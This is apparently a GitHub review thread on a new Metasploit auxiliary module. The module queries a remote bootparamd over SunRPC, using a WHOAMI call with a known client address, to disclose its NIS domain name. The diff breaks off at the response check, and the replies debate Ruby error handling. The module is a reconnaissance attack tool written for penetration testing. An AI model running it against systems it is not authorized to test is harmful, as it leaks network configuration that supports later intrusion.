modules/auxiliary/gather/nis_bootparamd_domain.rb

```diff
@@ -0,0 +1,151 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+
+  include Msf::Exploit::Remote::SunRPC
+  include Msf::Auxiliary::Report
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'        => 'NIS bootparamd Domain Name Disclosure',
+      'Description' => %q{
+        This module discloses the NIS domain name from bootparamd.
+
+        You must know a client address from the target's bootparams file.
+
+        Hint: try hosts within the same network range as the target.
+      },
+      'Author'      => [
+        'SATAN',         # boot.c
+        'pentestmonkey', # Blog post
+        'wvu'            # Metasploit module
+      ],
+      'References'  => [
+        ['URL', 'https://tools.ietf.org/html/rfc1831'],
+        ['URL', 'https://tools.ietf.org/html/rfc4506'],
+        ['URL', 'http://pentestmonkey.net/blog/nis-domain-name']
+      ],
+      'License'     => MSF_LICENSE
+    ))
+
+    register_options([
+      OptEnum.new('PROTOCOL',  [true, 'Protocol to use', 'udp', %w{tcp udp}]),
+      OptAddress.new('CLIENT', [true, 'Client from target\'s bootparams file'])
+    ])
+
+    register_advanced_options([
+      OptFloat.new('XDRTimeout', [true, 'XDR decoding timeout', 10.0])
+    ])
+  end
+
+  def run
+    proto  = datastore['PROTOCOL']
+    client = datastore['CLIENT']
+
+    begin
+      sunrpc_create(
+        proto,  # Protocol: UDP (17)
+        100026, # Program: BOOTPARAMS (100026)
+        1       # Program Version: 1
+      )
+    rescue Rex::ConnectionError
+      print_error('Could not connect to portmapper')
+      return
+    rescue Rex::Proto::SunRPC::RPCError
+      print_error('Could not connect to bootparamd')
+      return
+    end
+
+    # Flavor: AUTH_NULL (0)
+    sunrpc_authnull
+
+    # Convert ASCII to network byte order to four unsigned chars :(
+    client_addr = Rex::Socket.addr_aton(client).unpack('C4')
+
+    bootparam_whoami = Rex::Encoder::XDR.encode(
+      1,           # Address Type: IPv4-ADDR (1)
+      *client_addr # Client Address: [redacted]
+    )
+
+    begin
+      res = sunrpc_call(
+        1,               # Procedure: WHOAMI (1)
+        bootparam_whoami # Boot Parameters
+      )
+    rescue Rex::Proto::SunRPC::RPCError
+      print_error('Could not call bootparamd procedure')
+      return
+    rescue Rex::Proto::SunRPC::RPCTimeout
+      print_error('Could not disclose NIS domain name (try another CLIENT?)')
+      return
+    ensure
+      # Shut it down! Shut it down forever!
+      sunrpc_destroy
+    end
+
+    if res.nil?
+      print_error('Invalid response from server')
+      return
+    end
```

Comment:
Code golf:

```ruby
unless res
  fail_with(Failure::UnexpectedReply, 'Invalid response from server')
end
```

Reply:
I've been preferring more positive logic lately, but we can make this change. Anything complicated with `unless` is the devil.

Reply:
Your code is only positive logic because it's a double negative.

Reply:
I fixed `fail_with` to work with aux modules, and I still find myself doing `print_error` and `return`. Oof.

Reply:
Positively worded. :-)

`unless` is already a negative.

Reply:
As of #8643, `fail_with` is preferred for aux and post modules.

Reply:
But we used to recommend authors use `print_error` and `return` before that. :/

Reply:
https://github.com/rapid7/metasploit-framework/blob/master/.rubocop.yml#L54

Reply:
The output from `print_error` is prettier.

I didn't golf the `print_error` statements in the `rescue` clauses, as they're more "expected" errors.

Reply:
```
msf auxiliary(gather/nis_bootparamd_domain) > pry
[1] pry(#<Msf::Modules::Mod617578696c696172792f6761746865722f6e69735f626f6f74706172616d645f646f6d61696e::MetasploitModule>)> print_error('Invalid response from server')

[-] Invalid response from server
=> "\e[1m\e[31m[-]\e[0m Invalid response from server\n"
[2] pry(#<Msf::Modules::Mod617578696c696172792f6761746865722f6e69735f626f6f74706172616d645f646f6d61696e::MetasploitModule>)> fail_with(Failure::UnexpectedReply, 'Invalid response from server')
Msf::Auxiliary::Failed: unexpected-reply: Invalid response from server
from /home/wvu/metasploit-framework/lib/msf/core/auxiliary.rb:163:in `fail_with'
[3] pry(#<Msf::Modules::Mod617578696c696172792f6761746865722f6e69735f626f6f74706172616d645f646f6d61696e::MetasploitModule>)>
```

Maybe I should change `fail_with` to be prettier. It used to give a nasty stack trace for aux and post. The improvement was only slight.

Reply:
Oops, that's without the special `rescue` for it.

Reply:
```
msf auxiliary(gather/nis_bootparamd_domain) > rerun
[*] Reloading module...

[-] 192.168.33.10:111 - Auxiliary aborted due to failure: unexpected-reply: Invalid response from server
[*] Auxiliary module execution completed
msf auxiliary(gather/nis_bootparamd_domain) >
```

It's still a little verbose.